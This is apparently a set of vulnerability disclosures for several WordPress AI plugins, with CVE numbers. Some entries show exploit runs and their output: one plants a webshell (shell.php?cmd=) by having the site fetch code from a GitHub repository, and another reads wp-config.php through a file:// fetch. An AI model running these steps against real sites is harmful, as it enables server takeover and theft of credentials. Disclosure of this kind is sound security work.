The AI Feeds WordPress plugin versions 1.0.11 and below contain an unauthenticated remote code execution vulnerability in the actualizador_git.php file. This file is directly accessible via HTTP without any authentication or authorization checks, allowing unauthenticated attackers to download arbitrary GitHub repositories and overwrite plugin files, leading to remote code execution.
TL;DR Exploits
A exploit.py is provided to demonstrate a remote attacker uploading shell.php and executing remote code:
python3 CVE-2025-13597.py -t http://techcorp.cc -o d0n601 -r minimal-rce -k github_pat_YOURKEY -c whoami
[*] Exploiting actualizador_git.php vulnerability...
[*] Downloading and installing shell from GitHub repository: d0n601/minimal-rce
Descargando d0n601/minimal-rce@main ...
Eliminando entradas extra...
Copiando archivos...
OK. Mirror aplicado en: /var/www/html/wp-content/plugins/ai-feeds
[*] Exploit executed. Checking if shell.php was created...
[*] Testing shell access...
www-data
[*] Shell should be accessible at:
http://techcorp.cc/wp-content/plugins/ai-feeds/shell.php?cmd=COMMAND
Technical Analysis
The vulnerability exists in /wp-content/plugins/ai-feeds/actualizador_git.php. This file implements a GitHub repository mirroring system that can be accessed directly via HTTP without any security controls.
The Cibeles AI WordPress plugin versions 1.10.8 and below contain an unauthenticated remote code execution vulnerability in the actualizador_git.php file. This file is directly accessible via HTTP without any authentication or authorization checks, allowing unauthenticated attackers to download arbitrary GitHub repositories and overwrite plugin files, leading to remote code execution.
TL;DR Exploits
A CVE-2025-13595.py is provided to demonstrate a remote attacker uploading shell.php and executing remote code:
python3 CVE-2025-13595.py -t http://techcorp.cc -o d0n601 -r minimal-rce -k github_pat_YOURKEY -c whoami
[*] Exploiting actualizador_git.php vulnerability...
[*] Downloading and installing shell from GitHub repository: d0n601/minimal-rce
Descargando d0n601/minimal-rce@main ...
Eliminando entradas extra...
Copiando archivos...
OK. Mirror aplicado en: /var/www/html/wp-content/plugins/cibeles-ai
[*] Exploit executed. Checking if shell.php was created...
[*] Testing shell access...
www-data
[*] Shell should be accessible at:
http://techcorp.cc/wp-content/plugins/cibeles-ai/shell.php?cmd=COMMAND
Technical Analysis
The vulnerability exists in /wp-content/plugins/cibeles-ai/actualizador_git.php. This file implements a GitHub repository mirroring system that can be accessed directly via HTTP without any security controls.
The AI Engine for WordPress plugin contains a vulnerability in its image insertion feature that allows any authenticated user with post editing capabilities (Contributor, Author, Editor, Administrator) to download arbitrary files from the server. The vulnerability stems from the lqdai_update_post AJAX endpoint lacking proper capability checks and the insert_image() function using file_get_contents() with user-controlled URLs without protocol validation, allowing arbitrary file downloads via the file:// protocol.
TL;DR Exploits
A POC CVE-2025-13380.py is provided to demonstrate a Contributor level user downloading the site’s wp-config.php file.
python3 ./exploit.py http://techcorp.cc contributor password
[+] Target: http://techcorp.cc
[+] Username: contributor
[+] Nonce obtained: 5dc61a0166
[+] Post created with ID: 148
[+] File written to uploads directory
[+] Attempting to retrieve file from: http://techcorp.cc/wp-content/uploads/2025/11/varwwwhtmlwp-config.php.jpg
[+] File retrieved successfully!
[+] wp-config.php contents:
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
...
...
...
Details
File Insert Function
The lqdai_update_post AJAX action calls the update_post() function on line 315 of /wp-content/plugins/liquid-chatgpt/liquid-chatgpt.php, which lacks proper capability checks and allows any authenticated user to modify posts they can edit:
The WPBookit plugin does not validate user permission or sanitize custom CSS/JS code in its save_custome_code AJAX endpoint, allowing unauthenticated attackers to inject arbitrary JavaScript that executes on every page load, leading to stored XSS and potential session hijacking.
The vulnerability exists in the save_custome_code method of the WPB_Setting_Controller class. The plugin registers AJAX endpoints for unauthenticated users, allowing any visitor to inject arbitrary CSS/JS code that gets executed on every page load.
The WordPress S2B AI Assistant plugin (versions 2.47 and prior) contains an arbitrary file upload vulnerability that allows authenticated WordPress users with Editor role or higher to upload malicious PHP files to the server, potentially leading to remote code execution.
TL;DR Exploits
A POC CVE-2025-12973.py is provided to demonstrate a remote attacker uploading shell.php and executing remote code:
The vulnerability exists in the Utils.php file at the storeFile() method, which is called by the /wp-admin/admin-post.php endpoint with action s2b_store_chatbot_upload. The upload functionality uses a custom file extension whitelist that explicitly allows dangerous file types including PHP files. This allows authenticated WordPress users with Editor role or higher to upload arbitrary files, including PHP files that can be executed on the server.